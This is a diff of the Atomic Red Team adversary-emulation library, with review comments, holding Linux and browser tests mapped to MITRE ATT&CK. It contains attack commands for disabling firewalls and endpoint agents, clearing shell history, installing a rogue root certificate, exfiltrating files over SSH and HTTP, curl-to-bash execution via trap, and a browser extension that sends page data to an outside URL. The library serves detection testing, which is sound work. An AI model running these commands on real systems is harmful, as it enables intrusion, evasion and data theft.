Automation within the Atomic Red Team Framework is largely driven by the self-describing format of the human-readable descriptions. This requires only two things:
1) Unique techniques within a tactic are described through separate markdown H3 ("```###```") tags.
2) Code that demonstrates this technique is within that H3 section, and indented by four spaces. As is often done, this code may be broken into chunks with descriptive text before or after it. This additional content will be ignored.
When you put these together, you get a basic technique description that might look like this:
```
### bitsadmin.exe
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
```
Adding automation of thie technique is as simple as this, in ```AtomicRedTeam.psm1```
```
$actions = @{
'Windows/Execution/BitsAdmin' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Execution/BitsAdmin.md -SectionName bitsadmin.exe
## Launch the action
Invoke-Expression $commands[0]
}
...
```
## Respecting User Systems
Some tests make security-impacting changes to the host. To make sure that this is not done without user awareness, we need to also support the ```-Force``` parameter. We can do that by wrapping our invocation logic with the following code:
```
if($Force -or $PSCmdlet.ShouldContinue("Do you with to clear the System log?", "Confirm impactful change"))
{
...
}
```
An example of this is in ```Windows/Defense_Evasion/Indicator_Removal_on_Host/System```
```
'Windows/Defense_Evasion/Indicator_Removal_on_Host/System' = {
if($Force -or $PSCmdlet.ShouldContinue("Do you with to clear the System log?", "Confirm impactful change"))
{
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Defense_Evasion/Indicator_Removal_on_Host.md -SectionName 'wevtutil' |
Where-Object { $_ -match 'System' }
## Launch the action
Invoke-Expression $commands[0]
}
}
```
## Tweaking Documentation into Code
An action sometimes requires slight modification before evaluating it directly. For example, a portion of the command is left in as an demonstration - but should be replaced with something system-specific. A demonstration of this is from ```'Windows/Execution/Trusted_Developer_Utilities/MSBuild'```:
C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj
_File.csproj_ is not actually what you want to run - the Atomic Red Team framework includes a sample payload in its ```/Windows/Payloads``` directory. Putting this value in the example itself might muddy the meaning of the content, so we can change it at runtime in the action itself. Here's an example:
```
$actions = @{
...
'Windows/Execution/Trusted_Developer_Utilities/MSBuild' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Execution/Trusted_Developer_Utilities.md -SectionName msbuild.exe
$commandToInvoke,$commandArgs = $commands[0] -split ' '
## Run it, but with the real MSBuildBypass we've got in /Windows/Payloads
& $commandToInvoke ..\Windows\Payloads\MSBuildBypass.csproj
}
...
```
+35
@@ -0,0 +1,35 @@
## How to contribute to Atomic Red Team
#### **Atomic Contribution**
Atomic Red Team welcomes all types of contributions as long as it is mapped to [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page).
The Framework is also meant to be "easy". If your Atomic test is complicated and requires multiple external utilities/packages/Kali, we may dismiss it.
TEST YOUR Atomic Test! Be sure to run it from a few OS platforms before submitting a pull to ensure everything is working correctly.
If sourcing from another tool/product (ex. generated command), be sure to cite it in your .md file.
Any and all Payloads need to be placed in the respective Windows|Mac|Linux Payload directory.
Be sure you update the ATT&CK url, Txxxx number, and the title (ex. InstallUtil).
#### Atomic Template Example
## InstallUtil
MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118)
### Execution Examples:
Input:
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
## Test Script
[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs)
+24
@@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
@@ -0,0 +1,35 @@
# Remote File Copy
MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105)
## Adversary System Configuration
### Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
## Victim System Configuration
### Ensure SSH access has been configured for a victim account
### Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
## Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
## Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
## Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
## Pull file from adversary using scp
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
## Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
## Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
@@ -0,0 +1,6 @@
# Create Account
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
useradd -M -N -r -s /bin/bash -c "Evil Account" evil_user
@@ -0,0 +1,22 @@
# Clear Command History
MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1146)
## multiple shells
unset HISTFILE
export HISTFILESIZE=0
history -c
## bash
rm ~/.bash_history
echo "" > ~/.bash_history
cat /dev/null > ~/.bash_history
ln -sf /dev/null ~/.bash_history
@@ -0,0 +1,36 @@
# Disabling Security Tools
MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
## Stop and disable firewall on CentOS/RHEL 6 and below
service iptables stop
chkconfig off iptables
service ip6tables stop
chkconfig off ip6tables
## Stop and disable firewall on CentOS/RHEL 7 and above
systemctl stop firewalld
systemctl disable firewalld
## Stop and disable syslog on CentOS/RHEL 6 and below
service rsyslog stop
chkconfig off rsyslog
## Stop and disable syslog on CentOS/RHEL 7 and above
systemctl stop rsyslog
systemctl disable rsyslog
## Stop and disable Cb Response Daemon on CentOS/RHEL 6 and below
service cbdaemon stop
chkconfig off cbdaemon
## Stop and disable Cb Response Daemon on CentOS/RHEL 7 and above
systemctl stop cbdaemon
systemctl disable cbdaemon
## Disable SELinux Enforcement
setenforce 0
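Review bot: `chkconfig off iptables` (and the matching `chkconfig off ip6tables`, `chkconfig off rsyslog`, `chkconfig off cbdaemon`) has its arguments reversed; the command takes the service name first, `chkconfig iptables off`, and as written chkconfig reports an unknown service named `off`. Since the framework README in this commit says the indented code inside these H3 sections is what the automation executes, these lines are effectively code and the fix applies to all four occurrences.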
+23
@@ -0,0 +1,23 @@
## File Deletion
MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
### Victim Configuration
echo "This file will be shredded" > /tmp/victim-shred.txt
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
### Delete a single file
rm -f /tmp/victim-files/a
### Delete an entire folder
rm -rf /tmp/victim-files
### Overwrite and delete a file with shred
shred -u /tmp/victim-shred.txt
+15
@@ -0,0 +1,15 @@
# HISTCONTROL
MITRE ATT&CK Technique: [T1148](https://attack.mitre.org/wiki/Technique/T1148)
### Set the environment variable
export HISTCONTROL=ignoreboth
OR
echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
### Preface commands with a space to exclude them from .bash_history
ls
whoami > recon.txt
@@ -0,0 +1,22 @@
# Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
To create visible directories and files
mkdir visible-directory
echo "this file is visible" > visible-directory/visible-file
# List the contents the current directory and visible directory
ls
ls visible-directory
To create hidden directories and files
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
# List the contents the current directory and hidden directory
ls -la
ls -la .hidden-directory
@@ -0,0 +1,20 @@
# Install Root Certificate
MITRE ATT&CK Technique: [T1130](https://attack.mitre.org/wiki/Technique/T1130)
## Create a root CA with openssl
openssl genrsa -out rootCA.key 4096
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -out rootCA.crt
## Install root CA on CentOS/RHEL 5 and below
cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
## Install root CA on CentOS/RHEL 6 and above
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
update-ca-trust
## Testing the trusted certificate.
To test the new trust, apply the root certificate or another signed with it to a SSL/TLS web service and attempt a connection with curl or wget.
curl https://art.evil.com
+21
@@ -0,0 +1,21 @@
## Rootkits
MITRE ATT&CK Technique: [T1014](https://attack.mitre.org/wiki/Technique/T1014)
### Loadable Kernel Module based Rootkit
Input:
sudo insmod MODULE.ko
OR
Input:
sudo modprobe MODULE.ko
### LD_PRELOAD based Rootkit
Input:
export LD_PRELOAD=$PWD/libmy_r00tkit.so
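Review bot: `sudo modprobe MODULE.ko` is not equivalent to the insmod line above it — modprobe resolves a module name from the installed modules tree and does not take a `.ko` file path, so this form fails with a "module not found" error. Either present it as `sudo modprobe MODULE` (after the module has been installed under `/lib/modules`) or drop the OR alternative and keep only `insmod`. The `MODULE.ko` and `libmy_r00tkit.so` placeholders should also be called out as such, since no such files ship with the repository.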
+30
@@ -0,0 +1,30 @@
# Timestomp
MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099)
### Create a test file to work with
touch testfile
OR
echo "This is only a test" > testfile
### Examine the current timestamp
stat testfile
### Set only the access timestamp
touch -a -t 197001010000.00 testfile
stat testfile
### Set only the modification timestamp
touch -m -t 197001010000.00 testfile
stat testfile
### Setting the creation timestamp requires changing the system clock and reverting.
### Sudo or root privileges are required to change date. Use with caution.
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch testfile
date -s "$NOW"
stat testfile
+33
@@ -0,0 +1,33 @@
# Account Discovery
MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
List of all accounts:
cat /etc/passwd
View sudoers access (requires root):
cat /etc/sudoers > /tmp/loot.txt
View accounts with UID 0:
grep 'x:0:' /etc/passwd > /tmp/loot.txt
List opened files by user:
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
Currently logged in:
Local:
finger
Remote:
finger @<computer_name>
Show if a user account has ever logged in remotely:
lastlog > /tmp/loot.txt
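Review bot: The sudoers, UID-0 and lastlog steps each use `>` to write `/tmp/loot.txt`, so every step clobbers the previous one's output; the Process Discovery and System Information Discovery files in this change use `>>` for the same loot file, and this file should match. The `username=$(echo $HOME | awk -F'/' '{print $3}')` derivation also breaks for any home directory not directly under a two-level prefix; `lsof -u "$(id -un)"` is the direct form and avoids the word-splitting on an unquoted `$username`.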
@@ -0,0 +1,19 @@
#File and Directory Discovery
## MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
Output a directory tree listing :
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
List Mounted File Systems and Paths
cat /etc/mtab > /tmp/loot.txt
Find pdfs on a machine
find . -type f -iname *.pdf > /tmp/loot.txt
Find hidden files on a machine
find . -type f -name ".*"
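Review bot: `find . -type f -iname *.pdf` leaves the glob unquoted, so the shell expands it against the current directory before find runs; if any PDF sits in the cwd the pattern becomes a list of filenames and find errors out. Quote it as in the hidden-files line below: `find . -type f -iname '*.pdf' > /tmp/loot.txt`. The `#File and Directory Discovery` heading is also missing the space after `#` and will not render as a heading.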
@@ -0,0 +1,9 @@
## Network Service Scanning
MITRE ATT&CK Technique: [T1046](https://attack.mitre.org/wiki/Technique/T1046)
### Bash One Liner
Input:
for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; done
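Review bot: The trailing `:` in `echo "port $port is closed" :` is passed to echo as an extra argument rather than acting as a no-op, so every closed port prints with a stray ` :` at the end; the intended no-op form would be `|| echo "port $port is closed"` with the colon removed. Because `/dev/tcp` connects have no timeout, filtered ports can stall this loop for a long time, so the file should say the test may not complete against a firewalled host. The same one-liner is duplicated in the macOS Network Service Scanning file in this change and has the same issues; the target address `192.168.1.1` is also hard-coded in both copies rather than presented as a placeholder to edit.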
+14
@@ -0,0 +1,14 @@
## Process Discovery
MITRE ATT&CK Technique: [T1057](https://attack.mitre.org/wiki/Technique/T1057)
### Process Discovery
Input:
ps >> /tmp/loot.txt
Input:
ps aux >> /tmp/loot.txt
@@ -0,0 +1,18 @@
## Remote System Discovery
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
### arp
Input:
arp -a | grep -v '^?'
### Network scanning
Input:
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
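Review bot: The `-o` option on `ping -c 1 192.168.1.$ip -o` is the BSD/macOS "exit after first reply" flag; the Linux iputils ping does not appear to accept it, so on the Linux side of this change the loop likely prints a usage error for every address and reports nothing as UP. This file is a verbatim copy of the macOS Remote System Discovery file; the Linux copy should drop `-o` (for `-c 1` it adds nothing) and, as elsewhere, mark `192.168.1.` as a subnet to be edited.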
@@ -0,0 +1,16 @@
# System Information Discovery
MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082)
List OS information:
uname -a >> /tmp/loot.txt
List OS specific information:
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
Show how long a machine has been running:
uptime >> /tmp/loot.txt
@@ -0,0 +1,17 @@
## System Network Configuration Discovery
MITRE ATT&CK Technique: [T1016](https://attack.mitre.org/wiki/Technique/T1016)
### Network Data
Input:
arp -a
Input:
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
Input:
ifconfig
+14
@@ -0,0 +1,14 @@
# Command-Line Interface
MITRE ATT&CK Technique: [T1059](https://attack.mitre.org/wiki/Technique/T1059)
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash"
Using Wget for equivalent functionality.
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash"
This will download the specified payload and set a marker file in `/tmp/art-fish.txt`.
+14
@@ -0,0 +1,14 @@
# Trap
MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
exit
After exiting the shell, the script will download and execute.
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' INT
After sending a keyboard interrupt (CTRL+C) the script will download and execute.
+30
@@ -0,0 +1,30 @@
## Data Compressed
MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002)
### Victim Configuration
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
echo "This file will be gzipped" > /tmp/victim-gzip.txt
echo "This file will be tarred" > /tmp/victim-tar.txt
### Compression with zip
zip /tmp/victim-files.zip /tmp/victim-files/*
### Compression with gzip
gzip -f /tmp/victim-gzip.txt
### Compression with tar
Directory
tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
File
tar -cvzf /tmp/victim-tar.tar.gz
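Review bot: The single-file tar step is missing its source argument — `tar -cvzf /tmp/victim-tar.tar.gz` names only the archive, so tar exits with "Cowardly refusing to create an empty archive" and the `/tmp/victim-tar.txt` file created in the Victim Configuration is never used. It should read `tar -cvzf /tmp/victim-tar.tar.gz /tmp/victim-tar.txt`.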
+20
@@ -0,0 +1,20 @@
## Data Encrypted
MITRE ATT&CK Technique: [T1022](https://attack.mitre.org/wiki/Technique/T1022)
### Victim Configuration
echo "This file will be encrypted" > /tmp/victim-gpg.txt
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
### Zip and encrypt a directory
zip --password "insert password here" /tmp/victim-files.zip /tmp/victim-files/*
### Encrypt a single file
gpg -c /tmp/victim-gpg.txt
<enter passphrase and confirm>
ls -l
@@ -0,0 +1,13 @@
## Data Transfer Size Limits
MITRE ATT&CK Technique: [T1030](https://attack.mitre.org/wiki/Technique/T1030)
### Victim Configuration
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
### Split into 5MB chunks
split -b 5000000 /tmp/victim-whole-file
ls -l
@@ -0,0 +1,31 @@
## Exfiltration Over Alternative Protocol
MITRE ATT&CK Technique: [T1048](https://attack.mitre.org/wiki/Technique/T1048)
### SSH
Remote to Local:
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Local to Remote:
tar czpf - /home/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /home.tar.gz.enc'
### HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
Using Python to establish a one-line HTTP server on victim system:
cd /tmp/victim-staging-area
python -m SimpleHTTPServer 1337
To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt
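Review bot: `python -m SimpleHTTPServer 1337` only exists on Python 2; on a host where `python` is Python 3 the module is not found and the HTTP half of this test never starts. Give both forms, `python -m SimpleHTTPServer 1337` and `python3 -m http.server 1337`, or state the interpreter requirement as the Custom Command and Control Protocol file in this change does. The firewall sentence would also be clearer if it said the rule is opened on the victim host, since that is where the listener runs.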
@@ -0,0 +1,35 @@
# Remote File Copy
MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105)
## Adversary System Configuration
### Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
## Victim System Configuration
### Ensure SSH access has been configured for a victim account
### Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
## Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
## Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
## Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
## Pull file from adversary using scp
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
## Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
## Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
-21
@@ -1,21 +0,0 @@
## MITRE ATT&CK Matrix - Linux
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Bootkit | Setuid and Setgid | Clear Command History | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | Create Account | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | System Information Discovery | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Redundant Access | | HISTCONTROL | Input Capture | System Network Configuration Discovery | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Trap | | Hidden Files and Directories | Network Sniffing | System Network Connections Discovery | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Valid Accounts | | Indicator Removal from Tools | Private Keys | System Owner/User Discovery | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
| | | Install Root Certificate | | | | | | | Multiband Communication |
| | | Masquerading | | | | | | | Multilayer Encryption |
| | | Redundant Access | | | | | | | Remote File Copy |
| | | Scripting | | | | | | | Standard Application Layer Protocol |
| | | Space after Filename | | | | | | | Standard Cryptographic Protocol |
| | | Timestomp | | | | | | | Standard Non-Application Layer Protocol |
| | | Valid Accounts | | | | | | | Uncommonly Used Port |
| | | | | | | | | | Web Service |
@@ -0,0 +1,37 @@
function exfil(str) {
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
// and probably a thousand other methods. But this one is easy.
var buffer = new TextEncoder("utf-8").encode(str);
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
function callUrl(buffer) {
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
// except it's example.com so w/e
var digest = hex(buffer);
var url = "https://example.com/" + digest;
console.log("Exfiltrating data to " + url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", url, true);
xmlHttp.send( null);
return digest;
}
function hex(buffer) {
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
var hexCodes = [];
var view = new DataView(buffer);
for (var i = 0; i < view.byteLength; i += 4) {
var value = view.getUint32(i)
var stringValue = value.toString(16)
var padding = '00000000'
var paddedValue = (padding + stringValue).slice(-padding.length)
hexCodes.push(paddedValue);
}
var athing = hexCodes.join("");
return hexCodes.join("");
}
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);
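Review bot: In `hex`, `var athing = hexCodes.join("")` is assigned and never used (the next line computes the same join again), and the four statements in the loop body from `view.getUint32(i)` to `paddedValue` drop the semicolons the rest of the file uses; remove the dead variable and terminate those statements. `crypto.subtle` is only exposed in secure contexts, so with the manifest matching `<all_urls>` the content script throws on plain-http pages before `callUrl` is reached, which is worth a comment above `exfil` so a tester does not mistake the missing request for a detection gap. `exfil` also returns a promise that the top-level `var digest = exfil(document.title)` neither awaits nor catches, so that failure surfaces only as an unhandled rejection in the extension console.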
@@ -0,0 +1,16 @@
{
"name": "Minimum Viable Malicious Extension",
"description": "Base Level Extension",
"version": "1.0",
"manifest_version": 2,
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": [
"inline.js"
]
}
]
}
+2
@@ -0,0 +1,2 @@
#! /bin/bash
echo So long, and thanks for all the fish! > /tmp/art-fish.txt
+9
@@ -0,0 +1,9 @@
#import <stdio.h>
#import <unistd.h>
int main()
{
printf("Hello\n");
sleep(60);
printf("Don't run random binaries!\n");
return 0;
}
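Review bot: `#import <stdio.h>` and `#import <unistd.h>` use a GCC/Objective-C extension that gcc flags as deprecated in C code; the portable form is `#include <stdio.h>` and `#include <unistd.h>`. Since the Setuid and Setgid file builds this with `make hello` and then sets the setuid bit, a header comment stating why the program sleeps would help, e.g. `/* Sleeps so the running setuid process can be observed by the discovery tests, then prints a reminder and exits. */`.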
+24
@@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
+1 -1
@@ -1,4 +1,4 @@
# Bash History
# Cron Job
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
@@ -0,0 +1,22 @@
# Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
To create visible directories and files
mkdir visible-directory
echo "this file is visible" > visible-directory/visible-file
# List the contents the current directory and visible directory
ls
ls visible-directory
To create hidden directories and files
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
# List the contents the current directory and hidden directory
ls -la
ls -la .hidden-directory
+10
@@ -0,0 +1,10 @@
# Trap
MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
exit
After exiting the shell, the script will download and execute.
@@ -0,0 +1,6 @@
# .bash_profile and .bashrc
MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
echo "/path/to/script.py" >> ~/.bash_profile
echo "/path/to/script.py" >> ~/.bashrc
@@ -0,0 +1,15 @@
# Setuid and Setgid
MITRE ATT&CK Technique: [T1166](https://attack.mitre.org/wiki/Technique/T1166)
Navigate to [hello.c](../Payloads/hello.c)
Input:
make hello
sudo chown root hello
sudo chmod u+s hello
./hello
+22
@@ -0,0 +1,22 @@
## MITRE ATT&CK Matrix - Linux
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Remote File Copy](Lateral_Movement/Remote_File_Copy.md) | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | [Data Encrypted](Exfiltration/Data_Encrypted.md) | Connection Proxy |
| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | [Data Transfer Size Limits](Exfiltration/Data_Transfer_Size_Limits.md) | Custom Command and Control Protocol |
| [Hidden Files and Directories](Persistence/Hidden_Files_and_Directories.md) | Web Shell | [File Deletion](Defense_Evasion/File_Deletion.md) | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
| Redundant Access | | [Hidden Files and Directories](Defense_Evasion/Hidden_Files_and_Directories.md) | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels |
| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels |
| Web Shell | | [Install Root Certificate](Defense_Evasion/Install_Root_Certificate.md) | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication |
| | | Masquerading | | | | | | | Multilayer Encryption |
| | | Redundant Access |
| | | [Rootkits](Defense_Evasion/Rootkits.md) | | | | | | | [Remote File Copy](Command_and_Control/Remote_File_Copy.md) |
| | | Scripting | | | | | | | Standard Application Layer Protocol |
| | | Space after Filename | | | | | | | Standard Cryptographic Protocol |
